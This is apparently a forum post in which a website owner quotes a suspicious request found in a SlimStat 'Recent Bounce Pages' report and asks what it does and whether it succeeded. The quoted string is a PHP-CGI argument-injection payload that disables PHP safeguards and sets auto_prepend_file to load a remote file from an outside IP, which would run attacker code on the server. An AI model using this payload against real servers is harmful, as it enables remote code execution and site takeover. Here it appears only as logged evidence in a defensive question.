SlimStat report on Recent Bounce Page

    I just checked my SlimStat reports and listed on Recent Bounce Pages found: \ /index.php?-dsafe_mode=Off -ddisable_functions=NULL -dallow_url_fopen=On -dallow_url_include=On -dauto_prepend_file=https://61.19.253.26/echo.txt \
    It looks like someone was trying to hack into the site.
    What would this do?
    How would I know if they were able to do it?
